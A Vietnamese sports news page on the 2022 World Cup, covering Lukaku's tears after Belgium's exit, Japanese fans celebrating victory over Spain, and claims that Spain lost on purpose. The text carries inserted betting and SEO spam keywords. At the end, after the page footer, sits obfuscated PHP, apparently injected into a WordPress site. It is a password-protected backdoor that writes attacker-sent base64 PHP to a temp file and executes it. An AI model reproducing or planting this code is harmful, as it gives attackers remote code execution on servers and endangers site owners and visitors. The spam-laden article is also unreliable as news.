Bóng đá 2/12: Lukaku khóc nức nở vì Bỉ bị loại

- Xem(370)

Bóng đá 2/12: Lukaku khóc nức nở vì Bỉ bị loại, Tokyo vỡ òa vì chiến tích của tuyển Nhật Bản, … là những nội dung thể thao hôm nay.

Lukaku khóc nức nở vì Bỉ bị loại

ĐT Bỉ buộc phải thắng Croatia để giành vé vào ket qua bong da vòng 1/8 World Cup 2022. Tuy nhiên, họ đã bị cầm hòa với tỷ số 0-0.

Trong trận đấu vừa qua, Romelu Lukaku là cái tên để lại nhiều thất vọng nhất với việc bỏ lỡ tới 3 cơ hội ghi bàn mười mươi. Sau tiếng còi mãn cuộc, Lukaku đã không giấu nổi sự thất vọng của mình. Anh đấm vỡ kính rồi bật khóc khi đi vào đường hầm.

Ban huấn luyện của Bỉ, bao gồm cả Thierry Henry, đã phải tới an ủi tiền đạo 29 tuổi.

Bóng đá 2/12: Lukaku khóc nức nở vì Bỉ bị loại
Bóng đá 2/12: Lukaku khóc nức nở vì Bỉ bị loại

Tokyo vỡ òa vì chiến tích của tuyển Nhật Bản

Tuyển Nhật Bản tiếp tục viết nên câu chuyện cổ tích khi đánh bại Tây Ban Nha (trước đó thắng Đức), để ghi tên mình vào vòng 1/8 World Cup 2022. Tại quê nhà, fan hâm mộ tại thủ đô Tokyo cũng có một đêm phát cuồng vì đội bóng con cưng.

Ở thủ đô Tokyo, rất đông CĐV thức xem và cổ vũ cho đội bóng con cưng.

Tokyo có một đêm không ngủ khi thức xem, để rồi vỡ òa cảm xúc khi tuyển Nhật Bản vượt qua Tây Ban Nha với tỉ số 2-1 và tiếp tục thắng tỷ lệ chơi.

Thời điểm kết thúc trận đấu vào lúc 6h sáng (giờ địa phương), CĐV tiếp tục hòa mình vào dòng người ăn mừng chiến thắng của đội nhà.

CĐV tố Tây Ban Nha cố tình thua Nhật Bản

Rạng sáng 2/12 (giờ Hà Nội), Đức hạ Costa Rica để giúp Tây Ban Nha tránh khỏi việc bị loại nhưng trận thua của “La Roja” lại khiến “Die Mannschaft” nói lời chia tay World Cup 2022.

“Với trận thua Nhật Bản, Tây Ban Nha sẽ tránh được Brazil, Argentina cho đến trận chung kết và chỉ phải đối mặt Morocco thay vì Croatia ở vòng 16 đội, đồng thời loại luôn đối thủ Đức khỏi World Cup”, phóng viên Jeff Borzello cho biết.

“Tây Ban Nha hoàn toàn áp đảo Nhật Bản nhưng lại cho thấy sự rời rạc đến khó tin khi đến gần khung thành, đặc biệt ở hiệp hai. Có lẽ đây là một kế hoạch”, tài khoản Mmasnooker bình luận. “Luis Enrique đã đi ngược lại với lời hứa gặp Đức ở chung kết. Một trận thua được nhiều hơn mất của Tây Ban Nha”, người dùng Michael nhận xét.

"Hy vọng qua bài viết trên, bạn đã nhận được những thông tin hữu ích và đầy đủ để theo dõi và cổ vũ cho đội bóng mình yêu thích. Hãy thường xuyên truy cập để cập nhật những tin tức mới nhất về bóng đá. Bài viết này chỉ mang tính chất tham khảo. Chúc các bạn may mắn!"

to top if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}